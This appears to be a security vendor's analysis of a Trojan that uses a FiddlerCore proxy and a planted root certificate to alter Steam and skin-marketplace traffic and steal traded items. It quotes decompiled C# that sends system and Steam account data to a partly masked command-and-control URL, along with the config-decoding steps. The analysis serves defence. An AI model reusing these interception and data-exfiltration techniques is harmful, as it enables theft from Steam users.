SHA1
- 2891c6502586de470cad2108c4367ef23b375ff7
- 3de7719afc981ee96b97300a4cd18b9365c771bf
A Trojan designed to steal collectibles from Steam users. It uses Fiddler to intercept server responses and replace the data in them. Fiddler is installed as a proxy on the infected computer. It will use the port indicated in the Trojan’s configuration (in the examined examples, this is port 8333). Fiddler also installs a root certificate in the system; this allows it to intercept encrypted HTTPS traffic.
Using the Windows system registry, it determines the path to the Steam directory, the operating system’s language settings, and the username from the AutoLoginUser field. In the Steam folder, the Trojan checks whether the file \config\loginusers.vdf is present: if it is, the malicious program parses it and extracts pairs resembling “account name<=> steamid64”.
The Trojan sends the collected information to the command and control server (this data is collected in 30-minute intervals):
NameValueCollection nameValueCollection = new NameValueCollection();
nameValueCollection.Add("type", "s");
nameValueCollection.Add("keyAccess", "809af20434864b142664613a8e42ff78");
nameValueCollection.Add("systemOS", value);
nameValueCollection.Add("systemUser", userName);
nameValueCollection.Add("systemMachine", machineName);
nameValueCollection.Add("languageOS", englishName);
nameValueCollection.Add("steamids", value2);
nameValueCollection.Add("steamPath", Class0.string_4);
nameValueCollection.Add("steamLang", Class0.string_6);
nameValueCollection.Add("steamRememberL", Class0.string_5);
nameValueCollection.Add("online", online.ToString());
Class0.POSTWithFakerHeader(Class0.soft2_req, nameValueCollection);
It saves the following files to its own folder:
- Windows Host.exe—the Trojan’s body;
- settings.conf—Fiddler’s configuration;
- FiddlerCore.dll—Fiddler’s library with a valid digital signature;
- BCMakeCert.dll—a library with an open source code BouncyCastle.Crypto;
- CertMaker.dll—the ICertificateProvider plugin for FiddlerCore.
It modifies the system registry branch [HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] to ensure its own auto start. The Trojan’s resources have one more executable file—Proxy.Resources.Cleaner.exe. It is used to launch and then shut down Fiddler.
It installs its handler for the OnBeforeResponse function of Fiddler’s library, which allows server responses to be changed into network requests. The handler ignores requests if their URL has the following values: “.bmp”, “.jpg”, “.jpeg”, “.js”, “.png”, “.ico”, “.svg”, “.pdf” and “localhost”. If the configuration of the malicious program has a special flag and a user visits one of the following websites: opskins.com, igxe.cn, bitskins.com, g2a.com, csgo.tm, market.csgo.com, market.dota2.net, tf2.tm, the webpage code is integrated with the malicious script downloaded from the command and control server. It replaces the collectibles recipient when exchanges are made on the specified websites.
If the Trojan’s configuration has the corresponding flag and the user of the infected computer visits the website steamcommunity.com, the Trojan sends the following POST request to the command and control server:
https://f****.pro/soft2/base.php?l=bG9ta2F0b3A%3D&k=809af20434864b142664613a8e42ff78&ek=cba2c8e810c06a917f95f6f424fbffa0
The request sends the data {"type": "r", "keyAccess": "809af20434864b142664613a8e42ff78"}, and the HTTP request gets the parameter “faker”: “gl”. In the received response, the symbols '\xD1\x96’ are replaced with 'i', ‘\xD1\x81’—with ‘c’, and '(' with ‘=’, after which the response is decoded using base64. The decrypted data represents the Trojan’s configuration, which contains the steamid of the user whose inventory is to be replaced, and also the parameters of the collectibles to be used for the replacement.
If the content type in an HTPP request is indicated as HTML, the URL contains the values “steamcommunity.com”, “/tradeoffer”, and the connection uses the HTTP protocol, the Trojan replaces the server’s response with error code 302 and switches the connection to the HTTPS protocol.
If the content type in the HTTP request is indicated as JSON, and the URL contains the values “steamcommunity.com/profiles/7656”, “/inventory/json/” or “steamcommunity.com/tradeoffer”, “partnerinventory” , “partner=”, “appid=”, extracts steamid of the partner and checks whether any steamid parameters are in the data received from the server. If not, it doesn’t do anything.
Then the Trojan extracts the steamid64 value of the exchange partner from the URL and checks whether the data obtained from the command and control server contains the parameters for steamid64. It reads the “Cookie” parameter of the HTTP header and checks the installed language in the parameter “Steam_Language”. If Russian is indicated as the “Steam_Language”, the Trojan will display messages in Russian; in all other cases—in English.
If the values jobject2["rgDescriptions"][jproperty.Name]["market_hash_name”] of the collectibles coincide with those indicated in the key for the server data sent for this steamid, the fields “market_hash_name”, “market_name”, “name”, “name_color”, “icon_url”, “icon_url_large”, “description”->“value” are replaced in rgDescription. They are replaced with data received from the command and control server. The field “classid” is not replaced.
If the content type in the HTTP request is indicated as JSON and the URL contains the values “steamcommunity.com/inventory/”, the Trojan extracts the steamid64 value from the URL and checks whether the data obtained from the command and control server contains the parameters for steamid64. It reads the “Cookie” parameter of the HTTP header and verifies what language is installed in the parameter “Steam_Language”. If Russian is indicated as the “Steam_Language”, the Trojan will display messages in Russian; in all other cases—in English. Then for the collectibles whose values jobject2["rgDescriptions"][jproperty.Name]["market_hash_name”] coincide with those indicated in the “name” field in the steamid data received from the command and control server, the fields are replaced with the values received from the command and control server.
If the content type in the HTTP request is indicated as HTML and the URL contains the values “steamcommunity.com/economy/itemclasshover/” and “content_only=1”, the Trojan parses the page and determines the steamid. Then it attempts to replace the characteristics of the collectibles according to the data it obtained from the command and control server.
